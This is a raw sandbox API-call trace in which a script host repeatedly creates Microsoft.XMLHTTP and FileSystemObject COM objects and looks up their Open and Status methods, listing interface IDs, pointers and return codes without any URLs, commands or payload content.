	[0409.290] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0409.290] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0409.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0409.984] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0409.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0409.985] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.985] SysStringLen (param_1=0x0) returned 0x0
	[0409.985] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.986] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0409.986] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0409.986] ??2@YAPEAX_K@Z () returned 0x62f310
	[0409.986] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0409.986] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.986] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0409.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0409.986] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0409.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.986] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0409.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.990] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.990] SysStringLen (param_1=0x0) returned 0x0
	[0409.990] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.990] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0409.990] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0409.990] ??2@YAPEAX_K@Z () returned 0x62f330
	[0409.990] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0409.990] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.990] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0409.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0409.991] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0409.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.991] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0409.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.991] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.991] SysStringLen (param_1=0x0) returned 0x0
	[0409.991] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.991] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0409.991] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0409.991] ??2@YAPEAX_K@Z () returned 0x62f310
	[0409.991] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0409.991] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.992] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0409.992] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.992] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.992] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.992] SysStringLen (param_1=0x0) returned 0x0
	[0409.992] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.992] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0409.992] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0409.992] ??2@YAPEAX_K@Z () returned 0x62f330
	[0409.992] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0409.992] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.993] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0409.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0409.993] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0409.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.993] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0409.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.993] longjmp () 
	[0409.993] longjmp () 
	[0409.993] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.993] SysStringLen (param_1=0x0) returned 0x0
	[0409.993] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.993] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0409.993] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.993] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0409.994] ??2@YAPEAX_K@Z () returned 0x62f310
	[0409.994] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f310) 
	[0409.994] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.994] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0409.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0409.994] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0409.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.994] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0409.994] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0409.994] longjmp () 
	[0409.994] longjmp () 
	[0409.994] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0409.994] SysStringLen (param_1=0x0) returned 0x0
	[0409.994] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0409.995] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0409.995] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0409.995] ??2@YAPEAX_K@Z () returned 0x62f330
	[0409.995] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0409.995] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0409.995] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0409.995] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0409.995] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
